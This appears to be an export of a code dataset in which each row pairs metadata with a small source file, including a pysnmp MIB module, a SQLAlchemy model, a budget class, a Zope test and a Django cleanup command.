rlIpmFftTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 9), )
if mibBuilder.loadTexts: rlIpmFftTable.setStatus('current')
rlIpmFftEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftIndex"), (0, "RADLAN-rlFft", "rlIpmFftSrcIpAddress"), (0, "RADLAN-rlFft", "rlIpmFftDstIpAddress"))
if mibBuilder.loadTexts: rlIpmFftEntry.setStatus('current')
rlIpmFftIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftIndex.setStatus('current')
rlIpmFftSrcIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftSrcIpAddress.setStatus('current')
rlIpmFftDstIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftDstIpAddress.setStatus('current')
rlIpmFftSrcIpMask = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 4), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftSrcIpMask.setStatus('current')
rlIpmFftInputIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInputIfIndex.setStatus('current')
rlIpmFftInputVlanTag = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInputVlanTag.setStatus('current')
rlIpmFftForwardAction = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("forward", 1), ("discard", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftForwardAction.setStatus('current')
rlIpmFftInportAction = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("sentToCPU", 1), ("discard", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInportAction.setStatus('current')
rlIpmFftAge = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 9, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftAge.setStatus('current')
rlIpmFftPortTagTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 10), )
if mibBuilder.loadTexts: rlIpmFftPortTagTable.setStatus('current')
rlIpmFftPortTagEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftPortIndex"), (0, "RADLAN-rlFft", "rlIpmFftPortSrcIpAddress"), (0, "RADLAN-rlFft", "rlIpmFftPortDstIpAddress"), (0, "RADLAN-rlFft", "rlIpmFftPortOutputifIndex"), (0, "RADLAN-rlFft", "rlIpmFftPortOutputTag"))
if mibBuilder.loadTexts: rlIpmFftPortTagEntry.setStatus('current')
rlIpmFftPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortIndex.setStatus('current')
rlIpmFftPortSrcIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortSrcIpAddress.setStatus('current')
rlIpmFftPortDstIpAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortDstIpAddress.setStatus('current')
rlIpmFftPortOutputifIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortOutputifIndex.setStatus('current')
rlIpmFftPortOutputTag = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 10, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftPortOutputTag.setStatus('current')
rlIpmFftCountersTable = MibTable((1, 3, 6, 1, 4, 1, 89, 47, 3, 11), )
if mibBuilder.loadTexts: rlIpmFftCountersTable.setStatus('current')
rlIpmFftCountersEntry = MibTableRow((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1), ).setIndexNames((0, "RADLAN-rlFft", "rlIpmFftCountersIndex"))
if mibBuilder.loadTexts: rlIpmFftCountersEntry.setStatus('current')
rlIpmFftCountersIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftCountersIndex.setStatus('current')
rlIpmFftInReceives = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInReceives.setStatus('current')
rlIpmFftForwDatagrams = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftForwDatagrams.setStatus('current')
rlIpmFftInDiscards = MibTableColumn((1, 3, 6, 1, 4, 1, 89, 47, 3, 11, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: rlIpmFftInDiscards.setStatus('current')
mibBuilder.exportSymbols("RADLAN-rlFft", rlIpxFftStnDstNode=rlIpxFftStnDstNode, rlIpmFftSrcIpMask=rlIpmFftSrcIpMask, rlIpFftSubNextHopIpAddr5=rlIpFftSubNextHopIpAddr5, rlIpFftNextHopVid=rlIpFftNextHopVid, rlIpxFftNumIndex=rlIpxFftNumIndex, rlIpmFftIndex=rlIpmFftIndex, rlIpmFftRouterAgingTimeout=rlIpmFftRouterAgingTimeout, rlIpmFftInReceives=rlIpmFftInReceives, rlIpFftSubTable=rlIpFftSubTable, rlIpFftL2InfoIfindex=rlIpFftL2InfoIfindex, rlIpmFftMibVersion=rlIpmFftMibVersion, rlIpmFftTable=rlIpmFftTable, rlIpxFftStnDstMacAddress=rlIpxFftStnDstMacAddress, rlIpxFftCountersTable=rlIpxFftCountersTable, rlIpFftYellowBoundary=rlIpFftYellowBoundary, rlIpmFftInDiscards=rlIpmFftInDiscards, rlIpxFftStnFacsIndex=rlIpxFftStnFacsIndex, rlIpmFftInportAction=rlIpmFftInportAction, rlIpFftSubEntry=rlIpFftSubEntry, rlIpFftSubNextHopIpAddr1=rlIpFftSubNextHopIpAddr1, rlIpFftL2InfoOutIfIndex=rlIpFftL2InfoOutIfIndex, rlIpFftNextHopEntry=rlIpFftNextHopEntry, rlIpFftStnDstIpAddrType=rlIpFftStnDstIpAddrType, rlIpMaxFftNumber=rlIpMaxFftNumber, rlIpxFftSubAge=rlIpxFftSubAge, rlIpxFftStnSrcMacAddress=rlIpxFftStnSrcMacAddress, rlIpmFftCountersTable=rlIpmFftCountersTable, rlIpFftCountersTable=rlIpFftCountersTable, rlIpFftAgingTimeSupported=rlIpFftAgingTimeSupported, rlIpxFftForwDatagrams=rlIpxFftForwDatagrams, rlIpxFftUnknownAddrMsgUsed=rlIpxFftUnknownAddrMsgUsed, rlIpmFFT=rlIpmFFT, rlIpFftForwDatagrams=rlIpFftForwDatagrams, rlIpmMaxFftNumber=rlIpmMaxFftNumber, rlIpmFftNumIndex=rlIpmFftNumIndex, rlIpFftStnTable=rlIpFftStnTable, rlIpFftNextHopMacAddress=rlIpFftNextHopMacAddress, rlIpmFftPortTagTable=rlIpmFftPortTagTable, rlIpxFftSubSrcMacAddress=rlIpxFftSubSrcMacAddress, rlIpmFftInputIfIndex=rlIpmFftInputIfIndex, rlIpmFftForwDatagrams=rlIpmFftForwDatagrams, rlIpFftStnIndex=rlIpFftStnIndex, rlFFT=rlFFT, rlIpFftNumEntry=rlIpFftNumEntry, rlIpFftL2InfoEntry=rlIpFftL2InfoEntry, rlIpFftSubNextHopIfindex4=rlIpFftSubNextHopIfindex4, rlIpxFftNumTable=rlIpxFftNumTable, rlIpFftRedBoundary=rlIpFftRedBoundary, rlIpxFftStnEntry=rlIpxFftStnEntry, rlIpmFftAge=rlIpmFftAge, rlIpmFftPortOutputifIndex=rlIpmFftPortOutputifIndex, rlIpFftSubNextHopIfindex1=rlIpFftSubNextHopIfindex1, rlIpxFftMibVersion=rlIpxFftMibVersion, rlIpFftSubNextHopIfindex7=rlIpFftSubNextHopIfindex7, rlIpxFftSubFacsIndex=rlIpxFftSubFacsIndex, rlIpmFftNumRoutesNumber=rlIpmFftNumRoutesNumber, rlIpxFftCountersIndex=rlIpxFftCountersIndex, rlIpFftNumStnRoutesNumber=rlIpFftNumStnRoutesNumber, rlIpFftSubNextHopIpAddr2=rlIpFftSubNextHopIpAddr2, rlIpFftSubNextHopIfindex2=rlIpFftSubNextHopIfindex2, rlIpFftNextHopValid=rlIpFftNextHopValid, rlIpxFftAgingTimeSupported=rlIpxFftAgingTimeSupported, rlIpmFftNumTable=rlIpmFftNumTable, NetNumber=NetNumber, rlIpFftL2InfoReferenceCount=rlIpFftL2InfoReferenceCount, rlIpxFftCountersEntry=rlIpxFftCountersEntry, rlIpFftStnDstMacAddress=rlIpFftStnDstMacAddress, rlIpFftNextHopTable=rlIpFftNextHopTable, rlIpFftL2InfoVid=rlIpFftL2InfoVid, rlIpmFftPortIndex=rlIpmFftPortIndex, rlIpFftL2InfoTable=rlIpFftL2InfoTable, rlIpFftSubNextHopIfindex6=rlIpFftSubNextHopIfindex6, rlIpxFftInDiscards=rlIpxFftInDiscards, rlIpFftCountersEntry=rlIpFftCountersEntry, rlIpFftStnTaggedMode=rlIpFftStnTaggedMode, rlIpmFftUserAgingTimeout=rlIpmFftUserAgingTimeout, rlIpFftStnSrcMacAddress=rlIpFftStnSrcMacAddress, rlIpFftSubNextHopIpAddr3=rlIpFftSubNextHopIpAddr3, rlIpmFftSrcIpAddress=rlIpmFftSrcIpAddress, rlIpFftSubNextHopIpAddr6=rlIpFftSubNextHopIpAddr6, rlIpxFftStnSrcNetid=rlIpxFftStnSrcNetid, rlIpFftNextHopifindex=rlIpFftNextHopifindex, rlIpxFftNumSubRoutesNumber=rlIpxFftNumSubRoutesNumber, rlIpxFftSubOutIfIndex=rlIpxFftSubOutIfIndex, rlIpFftSrcAddrSupported=rlIpFftSrcAddrSupported, rlIpFftSubnetSupported=rlIpFftSubnetSupported, rlIpxFftStnEncapsulation=rlIpxFftStnEncapsulation, rlIpxMaxFftNumber=rlIpxMaxFftNumber, rlIpxFftSubTci=rlIpxFftSubTci, rlIpmFftPortDstIpAddress=rlIpmFftPortDstIpAddress, rlIpFftStnEntry=rlIpFftStnEntry, rlIpxFftSubDstNetid=rlIpxFftSubDstNetid, rlIpFftInDiscards=rlIpFftInDiscards, rlIpFftNextHopOutIfIndex=rlIpFftNextHopOutIfIndex, rlIpxFftStnTci=rlIpxFftStnTci, rlIpmFftCountersIndex=rlIpmFftCountersIndex, rlIpFftAgingTimeout=rlIpFftAgingTimeout, rlIpFftStnAge=rlIpFftStnAge, rlIpFftL2InfoTaggedMode=rlIpFftL2InfoTaggedMode, rlIpxFFT=rlIpxFFT, rlIpFftUnknownAddrMsgUsed=rlIpFftUnknownAddrMsgUsed, rlIpFftSubNextHopCount=rlIpFftSubNextHopCount, rlIpFftSubNextHopIpAddr8=rlIpFftSubNextHopIpAddr8, rlIpFftSubMrid=rlIpFftSubMrid, rlIpFftInReceives=rlIpFftInReceives, rlIpmFftPortTagEntry=rlIpmFftPortTagEntry, rlIpFftL2InfoSrcMacAddress=rlIpFftL2InfoSrcMacAddress, rlIpFftStnDstIpAddress=rlIpFftStnDstIpAddress, rlIpmFftPortSrcIpAddress=rlIpmFftPortSrcIpAddress, rlIpFftStnOutIfIndex=rlIpFftStnOutIfIndex, rlIpFftSubAge=rlIpFftSubAge, rlIpxFftYellowBoundary=rlIpxFftYellowBoundary, rlIpxFftStnSrcNode=rlIpxFftStnSrcNode, rlIpxFftStnDstIpxAddrType=rlIpxFftStnDstIpxAddrType, rlIpFftNumSubRoutesNumber=rlIpFftNumSubRoutesNumber, rlIpFftSubNextHopSetRefCount=rlIpFftSubNextHopSetRefCount, rlIpxFftNumStnRoutesNumber=rlIpxFftNumStnRoutesNumber, rlIpxFftRedBoundary=rlIpxFftRedBoundary, rlIpFftDynamicSupported=rlIpFftDynamicSupported, rlIpFftNextHopIpAddress=rlIpFftNextHopIpAddress, rlIpmFftEntry=rlIpmFftEntry, rlIpxFftStnIndex=rlIpxFftStnIndex, rlIpxFftDynamicSupported=rlIpxFftDynamicSupported, rlIpmFftUnknownAddrMsgUsed=rlIpmFftUnknownAddrMsgUsed, rlIpFftStnDstRouteIpMask=rlIpFftStnDstRouteIpMask, rlIpFftNumIndex=rlIpFftNumIndex, rlIpFftCountersIndex=rlIpFftCountersIndex, rlIpmFftDstIpAddress=rlIpmFftDstIpAddress, rlIpFftNumTable=rlIpFftNumTable, rlIpFftSubNextHopIfindex5=rlIpFftSubNextHopIfindex5, rlIpxFftInReceives=rlIpxFftInReceives, rlIpFftL2InfoType=rlIpFftL2InfoType, rlIpFftL2InfoDstMacAddress=rlIpFftL2InfoDstMacAddress, rlIpFftSubNextHopIpAddr7=rlIpFftSubNextHopIpAddr7, rlIpxFftStnAge=rlIpxFftStnAge, rlIpFftMibVersion=rlIpFftMibVersion, rlIpFftSubDstIpMask=rlIpFftSubDstIpMask, rlIpxFftNumEntry=rlIpxFftNumEntry, rlIpFftNextHopReferenceCount=rlIpFftNextHopReferenceCount, rlIpxFftNetworkSupported=rlIpxFftNetworkSupported, rlIpxFftStnTable=rlIpxFftStnTable, rlIpFftNextHopType=rlIpFftNextHopType, rlIpmFftCountersEntry=rlIpmFftCountersEntry, rlIpmFftPortOutputTag=rlIpmFftPortOutputTag, rlIpmFftInputVlanTag=rlIpmFftInputVlanTag, rlIpFFT=rlIpFFT, rlIpxFftSubEncapsulation=rlIpxFftSubEncapsulation, rlIpFftSubNextHopIfindex3=rlIpFftSubNextHopIfindex3, rlIpxFftSubTable=rlIpxFftSubTable, rlIpFftL2InfoValid=rlIpFftL2InfoValid, rlIpmFftDynamicSupported=rlIpmFftDynamicSupported, rlIpxFftSubEntry=rlIpxFftSubEntry, rlIpxFftSubIndex=rlIpxFftSubIndex, Percents=Percents, rlIpFftStnMrid=rlIpFftStnMrid, rlIpFftSubNextHopIfindex8=rlIpFftSubNextHopIfindex8, rlIpxFftStnOutIfIndex=rlIpxFftStnOutIfIndex, rlIpmFftForwardAction=rlIpmFftForwardAction, rlIpFftSubNextHopIpAddr4=rlIpFftSubNextHopIpAddr4, rlIpxFftAgingTimeout=rlIpxFftAgingTimeout, rlIpxFftSrcAddrSupported=rlIpxFftSrcAddrSupported, PYSNMP_MODULE_ID=rlFFT, rlIpFftSubDstIpSubnet=rlIpFftSubDstIpSubnet, rlIpFftNextHopNetAddress=rlIpFftNextHopNetAddress, rlIpxFftSubDstMacAddress=rlIpxFftSubDstMacAddress, rlIpmFftNumEntry=rlIpmFftNumEntry, rlIpFftStnVid=rlIpFftStnVid, rlIpxFftStnDstNetid=rlIpxFftStnDstNetid)
| 120.327684 | 7,187 | 0.770072 | 4,591 | 42,596 | 7.144413 | 0.069919 | 0.010915 | 0.015091 | 0.020122 | 0.441006 | 0.424177 | 0.384787 | 0.370274 | 0.285488 | 0.242713 | 0 | 0.07396 | 0.079796 | 42,596 | 353 | 7,188 | 120.668555 | 0.762839 | 0.007465 | 0 | 0.005814 | 0 | 0 | 0.0974 | 0.006932 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020349 | 0 | 0.040698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83e02b17106968dc2136ef00e1169d410a1a9eff | 52 | py | Python | 89898.py | zhangbo2008/Reinforcement-learning-with-tensorflow | 7387f9731ed9a72891c2f6b51061fe588bdff021 | [
"MIT"
] | null | null | null | 89898.py | zhangbo2008/Reinforcement-learning-with-tensorflow | 7387f9731ed9a72891c2f6b51061fe588bdff021 | [
"MIT"
] | null | null | null | 89898.py | zhangbo2008/Reinforcement-learning-with-tensorflow | 7387f9731ed9a72891c2f6b51061fe588bdff021 | [
"MIT"
] | null | null | null |
a=1
for i in range(325):
a=a*0.1
print(a) | 7.428571 | 20 | 0.5 | 13 | 52 | 2 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 0.326923 | 52 | 7 | 21 | 7.428571 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83e5dadedf57db8de4b50535926b02839ad55a9b | 789 | py | Python | services/nris-api/backend/app/nris/models/legislation_act_section.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | services/nris-api/backend/app/nris/models/legislation_act_section.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | services/nris-api/backend/app/nris/models/legislation_act_section.py | parc-jason/mds | 8f181a429442208a061ed72065b71e6c2bd0f76f | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from app.extensions import db, api
from flask_restplus import fields
from sqlalchemy.orm import validates
from app.nris.utils.base_model import Base
class LegislationActSection(Base):
__tablename__ = "legislation_act_section"
__table_args__ = {
'comment': 'Contains a list of sections (or provisions of the act); i.e. "1.9.1", "1.5.1", etc.'}
legislation_act_section_id = db.Column(db.Integer, primary_key=True)
legislation_act_id = db.Column(db.Integer,
db.ForeignKey('legislation_act.legislation_act_id'))
section = db.Column(db.String(64))
def __repr__(self):
return f'<LegislationActSection legislation_act_section_id={self.legislation_act_section_id} section={self.section}>'
| 41.526316 | 125 | 0.726236 | 106 | 789 | 5.103774 | 0.509434 | 0.181146 | 0.155268 | 0.127542 | 0.07024 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012308 | 0.176172 | 789 | 18 | 126 | 43.833333 | 0.82 | 0 | 0 | 0 | 0 | 0.066667 | 0.321926 | 0.205323 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0.066667 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
83e77e1ae701b54c71b61809302ac4dd7707e7af | 1,362 | py | Python | budget.py | marianne-manaog/Budget_App | 5eb6723684aba5447282507a46220399bd24dcfe | [
"MIT"
] | null | null | null | budget.py | marianne-manaog/Budget_App | 5eb6723684aba5447282507a46220399bd24dcfe | [
"MIT"
] | null | null | null | budget.py | marianne-manaog/Budget_App | 5eb6723684aba5447282507a46220399bd24dcfe | [
"MIT"
] | null | null | null | # This Python file contains a 'Budget' class that can be used to instantiate objects
# based on different budget categories, such as food, clothing, and entertainment.
# These objects allow for depositing and withdrawing funds from each category,
# as well computing category balances.
from typing import List
# TODO: Add class' and methods' docstrings
# TODO: Implement method to transfer balance amounts between categories.
# TODO: Add unit tests for class' methods
class Budget:
def __init__(self, balance: float, category: str, ledger: List):
self.balance = balance
self.category = category
self.ledger = ledger
def __repr__(self):
return f"The budget for {self.category} has £{self.balance} remaining."
def deposit(self, deposit_amount: float, description: str):
self.balance += deposit_amount
self.ledger.append({"amount": deposit_amount, "description": description})
return self.balance, self.category
def withdraw(self, withdraw_amount: float, description: str):
if withdraw_amount <= self.balance:
self.balance -= withdraw_amount
self.ledger.append({"amount": withdraw_amount, "description": description})
else:
raise Exception(f"Insufficient amount to withdraw.")
return self.balance, self.category
| 37.833333 | 87 | 0.698238 | 165 | 1,362 | 5.678788 | 0.448485 | 0.093917 | 0.060832 | 0.053362 | 0.121665 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.218796 | 1,362 | 35 | 88 | 38.914286 | 0.879699 | 0.314978 | 0 | 0.105263 | 0 | 0 | 0.137297 | 0 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0.210526 | false | 0 | 0.052632 | 0.052632 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
83f903b0debb4cd080d40a980066c827580a16d0 | 974 | py | Python | src/zope/app/server/tests/test_schema.py | zopefoundation/zope.app.server | e0734fdc7327a1b41542b664eb745fa4299c2a57 | [
"ZPL-2.1"
] | null | null | null | src/zope/app/server/tests/test_schema.py | zopefoundation/zope.app.server | e0734fdc7327a1b41542b664eb745fa4299c2a57 | [
"ZPL-2.1"
] | 6 | 2017-10-30T14:56:41.000Z | 2020-11-11T14:08:19.000Z | src/zope/app/server/tests/test_schema.py | zopefoundation/zope.app.server | e0734fdc7327a1b41542b664eb745fa4299c2a57 | [
"ZPL-2.1"
] | 1 | 2015-04-03T08:06:09.000Z | 2015-04-03T08:06:09.000Z | ##############################################################################
#
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Test that the Zope appserver configuration schema can be loaded.
"""
import os.path
import unittest
import ZConfig
class TestConfiguration(unittest.TestCase):
def test_schema(self):
dir = os.path.dirname(os.path.dirname(__file__))
filename = os.path.join(dir, "schema.xml")
ZConfig.loadSchema(filename)
| 34.785714 | 78 | 0.62423 | 113 | 974 | 5.336283 | 0.663717 | 0.039801 | 0.046434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007229 | 0.147844 | 974 | 27 | 79 | 36.074074 | 0.719277 | 0.534908 | 0 | 0 | 0 | 0 | 0.035714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
83f9c0dee974a2214e7afc06300235869af7a9a1 | 55 | py | Python | lang/Python/binary-strings-2.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | 1 | 2018-11-09T22:08:38.000Z | 2018-11-09T22:08:38.000Z | lang/Python/binary-strings-2.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/binary-strings-2.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | 1 | 2018-11-09T22:08:40.000Z | 2018-11-09T22:08:40.000Z | s = "Hello "
t = "world!"
u = s + t # + concatenates
| 13.75 | 28 | 0.490909 | 8 | 55 | 3.375 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.309091 | 55 | 3 | 29 | 18.333333 | 0.710526 | 0.254545 | 0 | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8604edef4fdc2cdd9b4e0fb3642d316768ddf801 | 384 | py | Python | 2019_Challenges/Week 03-07/DoJoChallenge 03-07.py | cohpy/DoJo-Challenges | 619bbc4e00a06d2f7259bbd81941b28a91ba44cf | [
"MIT"
] | 2 | 2019-04-16T12:39:47.000Z | 2019-04-19T05:13:06.000Z | 2019_Challenges/Week 03-07/DoJoChallenge 03-07.py | cohpy/DoJo-Challenges | 619bbc4e00a06d2f7259bbd81941b28a91ba44cf | [
"MIT"
] | null | null | null | 2019_Challenges/Week 03-07/DoJoChallenge 03-07.py | cohpy/DoJo-Challenges | 619bbc4e00a06d2f7259bbd81941b28a91ba44cf | [
"MIT"
] | null | null | null | """
Given a array of numbers representing the stock prices of a company in
chronological order, write a function that calculates the maximum profit you
could have made from buying and selling that stock once. You must buy before
you can sell it.
For example, given [9, 11, 8, 5, 7, 10], you should return 5, since you
could buy the stock at 5 dollars and sell it at 10 dollars.
"""
| 34.909091 | 76 | 0.755208 | 70 | 384 | 4.142857 | 0.671429 | 0.055172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03871 | 0.192708 | 384 | 10 | 77 | 38.4 | 0.896774 | 0.973958 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f7cb22f48fb02240b2d5aef1639dd76f27bf491d | 546 | py | Python | nautobot_version_control/management/commands/cleanup_data.py | tim-fiola/nautobot-plugin-version-control | 63699fc8dbdc20926564264bad0f8e4ede4c7281 | [
"Apache-2.0"
] | 3 | 2021-05-12T19:27:18.000Z | 2021-07-28T19:48:20.000Z | nautobot_version_control/management/commands/cleanup_data.py | tim-fiola/nautobot-plugin-version-control | 63699fc8dbdc20926564264bad0f8e4ede4c7281 | [
"Apache-2.0"
] | 47 | 2021-05-18T21:48:40.000Z | 2021-09-03T18:06:57.000Z | nautobot_version_control/management/commands/cleanup_data.py | tim-fiola/nautobot-plugin-version-control | 63699fc8dbdc20926564264bad0f8e4ede4c7281 | [
"Apache-2.0"
] | 1 | 2021-08-11T21:16:00.000Z | 2021-08-11T21:16:00.000Z | """cleanup_data.py."""
from django.core.management.base import BaseCommand
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from nautobot.extras.models import Status
class Command(BaseCommand):
"""Cleanup Database after migrations."""
help = "Cleanup Database after migrations."
def handle(self, *args, **kwargs):
"""override handle."""
Status.objects.all().delete()
ContentType.objects.all().delete()
Permission.objects.all().delete()
| 27.3 | 58 | 0.712454 | 61 | 546 | 6.360656 | 0.557377 | 0.07732 | 0.123711 | 0.154639 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161172 | 546 | 19 | 59 | 28.736842 | 0.847162 | 0.124542 | 0 | 0 | 0 | 0 | 0.073593 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.4 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f7d0460950cd220807d9978f62964aa008cbc34b | 1,009 | py | Python | wilds/examples/losses.py | itsjohnward/wilds | aeafefd01456840c7bd5173d714b184ec86758af | [
"MIT"
] | null | null | null | wilds/examples/losses.py | itsjohnward/wilds | aeafefd01456840c7bd5173d714b184ec86758af | [
"MIT"
] | null | null | null | wilds/examples/losses.py | itsjohnward/wilds | aeafefd01456840c7bd5173d714b184ec86758af | [
"MIT"
] | null | null | null | import torch.nn as nn
